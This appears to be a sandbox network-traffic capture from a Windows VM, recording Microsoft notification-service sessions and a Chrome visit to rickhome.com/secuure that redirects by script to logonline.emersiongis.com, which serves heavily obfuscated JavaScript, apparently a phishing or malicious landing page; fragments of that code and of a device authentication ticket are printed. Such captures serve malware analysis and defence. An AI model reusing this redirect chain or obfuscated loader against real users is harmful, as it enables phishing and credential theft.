5728ab7dec0a9ca0<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAATUQEiOdSd6tXuOS2BC7e/3H9nci2HnZKrrgFb0arMFW44dFyL/jEzTprgv/ciB2YCX6GOH+1z5zNEuOJvZodgBRbgqBmn0WVZWgdI0N3jAPSi
2024-07-15 05:53:44 UTC	74	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 41 45 73 32 6b 32 33 30 67 6b 47 64 66 71 6e 56 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 37 32 38 61 62 37 64 65 63 30 61 39 63 61 30 0d 0a 0d 0a Data Ascii: BND 3 CON\QOS 56MS-CV: AEs2k230gkGdfqnV.3Context: 5728ab7dec0a9ca0
2024-07-15 05:53:45 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-07-15 05:53:45 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 2b 68 51 76 2b 71 56 39 63 6b 4f 58 4b 37 57 63 46 70 34 77 36 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: +hQv+qV9ckOXK7WcFp4w6w.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
3	192.168.2.6	49717	40.113.103.199	443

Timestamp	Bytes transferred	Direction	Data
2024-07-15 05:53:45 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 73 76 6d 63 74 51 53 31 70 45 4b 6a 48 4b 6e 79 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 33 36 64 61 62 66 34 64 39 36 35 64 39 38 30 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: svmctQS1pEKjHKny.1Context: a36dabf4d965d980
2024-07-15 05:53:45 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-07-15 05:53:45 UTC	1064	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 73 76 6d 63 74 51 53 31 70 45 4b 6a 48 4b 6e 79 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 33 36 64 61 62 66 34 64 39 36 35 64 39 38 30 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 54 55 51 45 69 4f 64 53 64 36 74 58 75 4f 53 32 42 43 37 65 2f 33 48 39 6e 63 69 32 48 6e 5a 4b 72 72 67 46 62 30 61 72 4d 46 57 34 34 64 46 79 4c 2f 6a 45 7a 54 70 72 67 76 2f 63 69 42 32 59 43 58 36 47 4f 48 2b 31 7a 35 7a 4e 45 75 4f 4a 76 5a 6f 64 67 42 52 62 67 71 42 6d 6e 30 57 56 5a 57 67 64 49 30 4e 33 6a 41 50 53 69 Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: svmctQS1pEKjHKny.2Context: a36dabf4d965d980<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAATUQEiOdSd6tXuOS2BC7e/3H9nci2HnZKrrgFb0arMFW44dFyL/jEzTprgv/ciB2YCX6GOH+1z5zNEuOJvZodgBRbgqBmn0WVZWgdI0N3jAPSi
2024-07-15 05:53:45 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 73 76 6d 63 74 51 53 31 70 45 4b 6a 48 4b 6e 79 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 33 36 64 61 62 66 34 64 39 36 35 64 39 38 30 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: svmctQS1pEKjHKny.3Context: a36dabf4d965d980<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-07-15 05:53:45 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-07-15 05:53:45 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 44 41 46 33 51 68 38 73 6f 55 47 75 49 55 78 71 44 73 68 4a 76 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: DAF3Qh8soUGuIUxqDshJvA.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49718	5.172.176.24	443	5788	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-15 05:53:46 UTC	662	OUT	GET /secuure HTTP/1.1 Host: rickhome.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-15 05:53:46 UTC	374	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 707 date: Mon, 15 Jul 2024 05:53:45 GMT server: LiteSpeed location: https://rickhome.com/secuure/ alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-07-15 05:53:46 UTC	707	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helv

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49719	5.172.176.24	443	5788	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-15 05:53:46 UTC	663	OUT	GET /secuure/ HTTP/1.1 Host: rickhome.com Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-15 05:53:46 UTC	359	IN	HTTP/1.1 200 OK Connection: close x-powered-by: PHP/7.0.33 content-type: text/html; charset=UTF-8 content-length: 110 date: Mon, 15 Jul 2024 05:53:45 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-07-15 05:53:46 UTC	110	IN	Data Raw: 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 22 68 74 74 70 73 3a 2f 2f 6c 6f 67 6f 6e 6c 69 6e 65 2e 65 6d 65 72 73 69 6f 6e 67 69 73 2e 63 6f 6d 2f 3f 4d 65 78 6f 76 6e 3d 4c 52 22 3c 2f 73 63 72 69 70 74 3e 0a Data Ascii: <script type="text/javascript">window.location.href = "https://logonline.emersiongis.com/?Mexovn=LR"</script>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49723	139.28.37.144	443	5788	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-15 05:53:48 UTC	696	OUT	GET /?Mexovn=LR HTTP/1.1 Host: logonline.emersiongis.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document Referer: https://rickhome.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-15 05:53:49 UTC	181	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 15 Jul 2024 05:53:49 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding
2024-07-15 05:53:49 UTC	14340	IN	Data Raw: 33 37 66 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 66 75 6e 63 74 69 6f 6e 20 61 30 45 28 54 2c 64 29 7b 76 61 72 20 6b 3d 61 30 78 28 29 3b 72 65 74 75 72 6e 20 61 30 45 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 78 29 7b 61 3d 61 2d 30 78 65 66 3b 76 61 72 20 45 3d 6b 5b 61 5d 3b 72 65 74 75 72 6e 20 45 3b 7d 2c 61 30 45 28 54 2c 64 29 3b 7d 28 66 75 6e 63 74 69 6f 6e 28 54 2c 64 29 7b 76 61 72 20 6b 52 3d 61 30 45 2c 6b 3d 54 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 76 61 72 20 61 3d 70 61 72 73 65 49 6e 74 28 6b 52 28 30 78 33 61 66 29 29 2f 30 Data Ascii: 37fc<!DOCTYPE html><html lang="en"> <head> <script type="text/javascript"> function a0E(T,d){var k=a0x();return a0E=function(a,x){a=a-0xef;var E=k[a];return E;},a0E(T,d);}(function(T,d){var kR=a0E,k=T();while(!![]){try{var a=parseInt(kR(0x3af))/0
2024-07-15 05:53:49 UTC	16384	IN	Data Raw: 33 66 66 39 0d 0a 78 31 28 30 78 33 36 31 29 5d 7c 7c 51 26 26 51 5b 27 73 68 61 6d 27 5d 29 26 26 6d 28 55 2c 78 31 28 30 78 33 36 31 29 2c 21 30 78 30 29 2c 66 28 43 2c 7a 2c 55 2c 71 29 3b 7d 7d 65 6c 73 65 7b 76 61 72 20 58 3d 6b 28 30 78 35 63 62 29 3b 66 5b 78 31 28 30 78 34 34 62 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 42 29 7b 76 61 72 20 78 32 3d 78 31 3b 72 65 74 75 72 6e 20 78 32 28 30 78 32 64 65 29 3d 3d 74 79 70 65 6f 66 20 42 3f 6e 75 6c 6c 21 3d 3d 42 3a 58 28 42 29 3b 7d 3b 7d 7d 3b 7d 2c 30 78 32 31 31 39 3a 66 75 6e 63 74 69 6f 6e 28 63 29 7b 76 61 72 20 78 33 3d 61 30 45 3b 63 5b 78 33 28 30 78 34 34 62 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 70 29 7b 74 72 79 7b 72 65 74 75 72 6e 21 21 70 28 29 3b 7d 63 61 74 63 68 28 72 29 7b 72 65 74 75 72 Data Ascii: 3ff9x1(0x361)]\|\|Q&&Q['sham'])&&m(U,x1(0x361),!0x0),f(C,z,U,q);}}else{var X=k(0x5cb);f[x1(0x44b)]=function(B){var x2=x1;return x2(0x2de)==typeof B?null!==B:X(B);};}};},0x2119:function(c){var x3=a0E;c[x3(0x44b)]=function(p){try{return!!p();}catch(r){retur
2024-07-15 05:53:49 UTC	16384	IN	Data Raw: 0a 34 30 30 30 0d 0a 33 62 30 29 5d 28 56 29 3b 7d 3b 7d 4e 5b 45 74 28 30 78 34 34 62 29 5d 3d 6a 3b 7d 2c 30 78 34 39 35 3a 66 75 6e 63 74 69 6f 6e 28 63 2c 70 2c 4e 29 7b 76 61 72 20 59 3d 4e 28 30 78 31 66 62 38 29 2c 76 3d 54 79 70 65 45 72 72 6f 72 2c 77 3d 66 75 6e 63 74 69 6f 6e 28 6d 29 7b 76 61 72 20 45 6f 3d 61 30 45 2c 66 2c 4d 3b 74 68 69 73 5b 45 6f 28 30 78 32 39 38 29 5d 3d 6e 65 77 20 6d 28 66 75 6e 63 74 69 6f 6e 28 67 2c 62 29 7b 76 61 72 20 45 5a 3d 45 6f 3b 69 66 28 45 5a 28 30 78 33 34 38 29 3d 3d 3d 45 5a 28 30 78 32 39 61 29 29 7b 76 61 72 20 5a 3d 69 3f 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 45 43 3d 45 5a 3b 69 66 28 5a 29 7b 76 61 72 20 43 3d 66 5b 45 43 28 30 78 32 35 36 29 5d 28 6d 2c 61 72 67 75 6d 65 6e 74 73 29 3b 72 Data Ascii: 40003b0)](V);};}N[Et(0x44b)]=j;},0x495:function(c,p,N){var Y=N(0x1fb8),v=TypeError,w=function(m){var Eo=a0E,f,M;this[Eo(0x298)]=new m(function(g,b){var EZ=Eo;if(EZ(0x348)===EZ(0x29a)){var Z=i?function(){var EC=EZ;if(Z){var C=f[EC(0x256)](m,arguments);r
2024-07-15 05:53:49 UTC	9	IN	Data Raw: 78 34 39 36 29 29 3b 0d 0a Data Ascii: x496));
2024-07-15 05:53:49 UTC	16384	IN	Data Raw: 34 30 30 30 0d 0a 67 26 26 21 67 5b 71 5d 26 26 6d 28 67 2c 71 2c 66 75 6e 63 74 69 6f 6e 28 5a 29 7b 72 65 74 75 72 6e 20 59 28 62 2c 74 68 69 73 29 3b 7d 2c 7b 27 61 72 69 74 79 27 3a 30 78 31 7d 29 3b 7d 3b 7d 7d 2c 30 78 63 39 32 3a 66 75 6e 63 74 69 6f 6e 28 63 2c 70 2c 4e 29 7b 76 61 72 20 69 48 3d 61 30 45 2c 59 3d 4e 28 30 78 31 37 38 64 29 3b 63 5b 69 48 28 30 78 34 34 62 29 5d 3d 59 26 26 21 21 53 79 6d 62 6f 6c 5b 69 48 28 30 78 33 65 61 29 5d 26 26 21 21 53 79 6d 62 6f 6c 5b 27 6b 65 79 46 6f 72 27 5d 3b 7d 2c 30 78 31 62 35 66 3a 66 75 6e 63 74 69 6f 6e 28 4e 2c 59 2c 4d 29 7b 76 61 72 20 69 65 3d 61 30 45 2c 71 2c 5a 2c 43 2c 7a 2c 51 3d 4d 28 30 78 32 30 63 35 29 2c 55 3d 4d 28 30 78 62 66 62 29 2c 46 3d 4d 28 30 78 62 36 32 29 2c 4b 3d 4d Data Ascii: 4000g&&!g[q]&&m(g,q,function(Z){return Y(b,this);},{'arity':0x1});};}},0xc92:function(c,p,N){var iH=a0E,Y=N(0x178d);c[iH(0x44b)]=Y&&!!Symbol[iH(0x3ea)]&&!!Symbol['keyFor'];},0x1b5f:function(N,Y,M){var ie=a0E,q,Z,C,z,Q=M(0x20c5),U=M(0xbfb),F=M(0xb62),K=M
2024-07-15 05:53:49 UTC	8	IN	Data Raw: 32 31 29 5d 26 26 0d 0a Data Ascii: 21)]&&
2024-07-15 05:53:49 UTC	16384	IN	Data Raw: 34 30 30 30 0d 0a 21 54 65 5b 70 69 28 30 78 33 31 37 29 5d 3b 7d 2c 54 47 3d 66 75 6e 63 74 69 6f 6e 28 54 65 29 7b 54 54 28 54 4e 2c 54 39 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 70 63 3d 61 30 45 2c 54 4c 3d 54 65 5b 70 63 28 30 78 32 37 37 29 5d 3b 54 38 3f 54 75 5b 70 63 28 30 78 31 31 62 29 5d 28 27 72 65 6a 65 63 74 69 6f 6e 48 61 6e 64 6c 65 64 27 2c 54 4c 29 3a 54 42 28 70 63 28 30 78 31 31 66 29 2c 54 4c 2c 54 65 5b 70 63 28 30 78 33 65 35 29 5d 29 3b 7d 29 3b 7d 2c 54 4a 3d 66 75 6e 63 74 69 6f 6e 28 54 65 2c 54 4c 2c 54 52 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 54 6a 29 7b 76 61 72 20 70 70 3d 61 30 45 3b 70 70 28 30 78 31 39 64 29 21 3d 3d 27 5a 49 54 41 48 27 3f 54 65 28 54 4c 2c 54 6a 2c 54 52 29 3a 54 6b 28 7b 7d 29 Data Ascii: 4000!Te[pi(0x317)];},TG=function(Te){TT(TN,T9,function(){var pc=a0E,TL=Te[pc(0x277)];T8?Tu[pc(0x11b)]('rejectionHandled',TL):TB(pc(0x11f),TL,Te[pc(0x3e5)]);});},TJ=function(Te,TL,TR){return function(Tj){var pp=a0E;pp(0x19d)!=='ZITAH'?Te(TL,Tj,TR):Tk({})
2024-07-15 05:53:49 UTC	8	IN	Data Raw: 65 6c 27 3a 30 78 0d 0a Data Ascii: el':0x
2024-07-15 05:53:49 UTC	16384	IN	Data Raw: 34 30 30 30 0d 0a 30 2c 27 73 65 6e 74 27 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 30 78 31 26 6b 70 5b 30 78 30 5d 29 74 68 72 6f 77 20 6b 70 5b 30 78 31 5d 3b 72 65 74 75 72 6e 20 6b 70 5b 30 78 31 5d 3b 7d 2c 27 74 72 79 73 27 3a 5b 5d 2c 27 6f 70 73 27 3a 5b 5d 7d 3b 72 65 74 75 72 6e 20 6b 72 3d 7b 27 6e 65 78 74 27 3a 6b 59 28 30 78 30 29 2c 27 74 68 72 6f 77 27 3a 6b 59 28 30 78 31 29 2c 27 72 65 74 75 72 6e 27 3a 6b 59 28 30 78 32 29 7d 2c 27 66 75 6e 63 74 69 6f 6e 27 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 28 6b 72 5b 53 79 6d 62 6f 6c 5b 72 6b 28 30 78 32 65 63 29 5d 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 3b 7d 29 2c 6b 72 3b 66 75 6e 63 74 69 6f 6e 20 6b 59 28 6b 76 29 7b 72 65 74 75 72 6e 20 66 Data Ascii: 40000,'sent':function(){if(0x1&kp[0x0])throw kp[0x1];return kp[0x1];},'trys':[],'ops':[]};return kr={'next':kY(0x0),'throw':kY(0x1),'return':kY(0x2)},'function'==typeof Symbol&&(kr[Symbol[rk(0x2ec)]]=function(){return this;}),kr;function kY(kv){return f
2024-07-15 05:53:49 UTC	8	IN	Data Raw: 2c 6b 63 5d 5d 3b 0d 0a Data Ascii: ,kc]];

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49725	184.28.90.27	443

Timestamp	Bytes transferred	Direction	Data
2024-07-15 05:53:50 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-07-15 05:53:51 UTC	467	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF67) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-eus-z1 Cache-Control: public, max-age=123364 Date: Mon, 15 Jul 2024 05:53:50 GMT Connection: close X-CID: 2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49726	184.28.90.27	443

Timestamp	Bytes transferred	Direction	Data
2024-07-15 05:53:51 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-07-15 05:53:52 UTC	515	IN	HTTP/1.1 200 OK ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF06) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-weu-z1 Cache-Control: public, max-age=123363 Date: Mon, 15 Jul 2024 05:53:51 GMT Content-Length: 55 Connection: close X-CID: 2
2024-07-15 05:53:52 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
9	192.168.2.6	49728	40.113.103.199	443

Timestamp	Bytes transferred	Direction	Data
2024-07-15 05:53:53 UTC	70	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 34 0d 0a 4d 53 2d 43 56 3a 20 70 5a 4e 6f 59 53 38 74 76 30 75 37 36 6d 6f 41 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 34 31 37 61 65 39 38 62 35 30 63 65 35 35 0d 0a 0d 0a Data Ascii: CNT 1 CON 304MS-CV: pZNoYS8tv0u76moA.1Context: 9417ae98b50ce55
2024-07-15 05:53:53 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-07-15 05:53:53 UTC	1063	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 30 0d 0a 4d 53 2d 43 56 3a 20 70 5a 4e 6f 59 53 38 74 76 30 75 37 36 6d 6f 41 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 34 31 37 61 65 39 38 62 35 30 63 65 35 35 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 54 55 51 45 69 4f 64 53 64 36 74 58 75 4f 53 32 42 43 37 65 2f 33 48 39 6e 63 69 32 48 6e 5a 4b 72 72 67 46 62 30 61 72 4d 46 57 34 34 64 46 79 4c 2f 6a 45 7a 54 70 72 67 76 2f 63 69 42 32 59 43 58 36 47 4f 48 2b 31 7a 35 7a 4e 45 75 4f 4a 76 5a 6f 64 67 42 52 62 67 71 42 6d 6e 30 57 56 5a 57 67 64 49 30 4e 33 6a 41 50 53 69 70 Data Ascii: ATH 2 CON\DEVICE 1040MS-CV: pZNoYS8tv0u76moA.2Context: 9417ae98b50ce55<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAATUQEiOdSd6tXuOS2BC7e/3H9nci2HnZKrrgFb0arMFW44dFyL/jEzTprgv/ciB2YCX6GOH+1z5zNEuOJvZodgBRbgqBmn0WVZWgdI0N3jAPSip
